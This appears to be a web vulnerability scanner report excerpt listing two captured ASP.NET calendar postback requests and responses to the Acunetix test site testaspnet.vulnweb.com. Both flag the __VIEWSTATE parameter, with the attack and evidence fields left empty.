Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1109 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,109 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8474&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgDAYTjoJNsIZGRk2JHMZHUpsGlil5b3Nlhm1PTeqok%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKc17ObAgLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJHmjsZB5fDS2CFSRSl%2BFnjB7rzYs%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:33:47 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgDAYTjoJNsIZGRk2JHMZHUpsGlil5b3Nlhm1PTeqok=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKc17ObAgLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJHmjsZB5fDS2CFSRSl+FnjB7rzYs=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:White" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8553&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgAABE%2F8YtsIZGRkABGdahfC3zRxZAnR6JiNc2PpFq8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLdv6iqBgK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMUhUaV7LKjCM0cs%2BFAqQEypaMYug%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:08:00 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgAABE/8YtsIZGRkABGdahfC3zRxZAnR6JiNc2PpFq8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLdv6iqBgK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMUhUaV7LKjCM0cs+FAqQEypaMYug=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:White" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
